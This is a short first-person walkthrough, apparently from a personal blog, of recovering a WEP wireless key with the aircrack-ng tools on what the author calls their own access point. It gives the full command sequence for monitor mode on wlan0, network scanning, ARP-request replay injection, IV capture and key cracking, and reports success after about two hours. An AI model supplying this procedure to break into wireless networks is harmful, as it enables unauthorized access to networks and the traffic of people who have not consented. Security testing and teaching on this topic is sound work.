First, I created a directory to store the captured packets.
DIR=$(mktemp -d)I then installed the utilities from the 10.10 archive.
sudo apt-get install aircrack-ngNext, I checked my interface.
sudo airmon-ng check wlan0And I stopped any services using wlan0 (avahi-daemon, NetworkManager, wpa_supplicant). Then I started monitoring mode on the interface.
sudo airmon-ng start wlan0Now, I needed to scan the airwaves, looking for my access point.
sudo airodump-ng mon0When I recognized the ESSID I was looking for, I noted the BSSID and Channel number. Then, I started replaying ARP requests.
sudo aireplay-ng -3 -b $bssid -h 00:00:00:00:00:00 wlan0I let this run for a while in one window. At the same time, I started capturing replies in another window.
sudo airodump-ng --channel $channel --bssid $bssid --write dump wlan0And in a third window, I started analyzing the captured data, looking for the key.
sudo aircrack-ng *capIt took about ~7500 ARP requests and IVs gathered over ~2 hours to divine the key, but it worked eventually, like a charm!